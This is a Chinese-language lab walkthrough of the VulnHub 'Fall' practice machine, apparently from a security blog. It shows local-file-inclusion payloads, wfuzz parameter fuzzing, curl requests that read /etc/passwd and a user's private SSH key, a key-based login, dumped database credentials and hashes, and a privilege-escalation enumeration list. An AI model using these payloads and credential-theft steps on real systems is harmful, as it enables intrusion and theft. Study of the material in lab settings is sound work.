【oscp】FALL,wfuzz对参数的模糊测试
靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-fall,726/
连接好kali,主机发现 & 端口扫描,发现了两个http服务,一个是80端口一个9090端口
这是80界面
这是9090界面
随便点点,文件包含伪协议如下(利用失败)
php://filter/read=convert.base64-encode/resource=index.php
php://filter/resource=index.php
php://filter/string.strip_tags|convert.base64-decode/resource=shell.php
data://text/plain,<?php%20phpinfo();?>
data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b
file:///etc/passwd
http://127.0.0.1/cmd.php?cmd=php://input
POST数据:<?php phpinfo()?>
看到网站底部,2.2.15版本
漏洞检索,但是需要鉴权我们并没有登录后台
这里看到一个用户发送的一个消息,留着有一个后门
接下来进行目录扫描,发现有一个test.php
dirsearch -u http://10.10.10.199
利用wfuzz工具,对参数进行爆破,并筛选出响应长度在100到100000之间的结果
wfuzz -u http://10.10.10.200/test.php?FUZZ=/etc/passwd -w /data/SecLists_Dict/Discovery/Web-Content/small_common.txt
--ss "^(.{100,100000})$"
此时发现有一个file参数,访问payload,并发现写那篇文章的qiu用户,
curl http://10.10.10.200/test.php?file=/etc/passwd
查看是否存在id_rsa,这个文件呢是私匙,在linux中它非常的敏感,如果用户泄露了此文件,那么攻击者就可以利用此文件免密登录服务器,通过下面的命令,可以看到目标服务器泄露了此用户的文件
curl http://10.10.10.200/test.php?file=/home/qiu/.ssh/id_rsa
确保私钥文件的权限被严格限制。通常,私钥文件的权限应设置为 600(只有所有者可以读写),否则可能利用不成功。
curl http://10.10.10.200/test.php?file=/home/qiu/.ssh/id_rsa > qiu
chmod 600 qiu
ssh qiu@10.10.10.200 -i qiu
登录成功后,进行内网信息收集,外网还有一个9090端口的web,那么就来看数据库配置,密码为P@ssw0rdINSANITY
查看表数据
mysql> select * from cms_users
-> ;
+---------+----------+----------------------------------+--------------+------------+-----------+----------------------+--------+---------------------+---------------------+
| user_id | username | password | admin_access | first_name | last_name | email | active | create_date | modified_date |
+---------+----------+----------------------------------+--------------+------------+-----------+----------------------+--------+---------------------+---------------------+
| 1 | qiu | bc8b9059c13582d649d3d9e48c16d67f | 1 | qiu qing | chan | qiu@goodtech.inc | 1 | 2021-05-21 17:06:29 | 2021-05-22 02:28:53 |
| 2 | patrick | 6aea70cc6a678f0f83a82e1c753d7764 | 1 | Patrick | Ong | patrick@goodtech.inc | 1 | 2021-05-22 02:28:33 | 2021-05-22 16:54:13 |
+---------+----------+----------------------------------+--------------+------------+-----------+----------------------+--------+---------------------+---------------------+
2 rows in set (0.00 sec)解密失败
基本信息收集
uname -a
hostname # 主机名
# 系统信息相关
lsb_release -a
cat /etc/os-release
cat /proc/version
# 权限相关
sudo -l # 查看可以使用sudo的文件
find / -perm -4000 -print 2>/dev/null # 查找 SUID文件
ls -al /etc/cron* # 查看所有计划任务
find / -perm 777 -type f 2>/dev/null # 查看文件权限为777的文件信息
# 其他信息收集
ps -aux
netstat -tulnp
history 直到历史命令
测试sudo,提权成功(之前的mysql服务器密码也可以尝试)
往期推荐
不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学
ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略
【oscp】vulnerable_docker,三种代理方法打入内网
【内网渗透】CobaltStrike与MSF联动互相上线的方式
本站内容部分转载于互联网,并不代表本站立场!如若本站内容侵犯了原著者的合法权益,可联系我们进行处理! 拒绝任何人以任何形式在本站发表与中华人民共和国法律相抵触的言论!THE END
暂无评论内容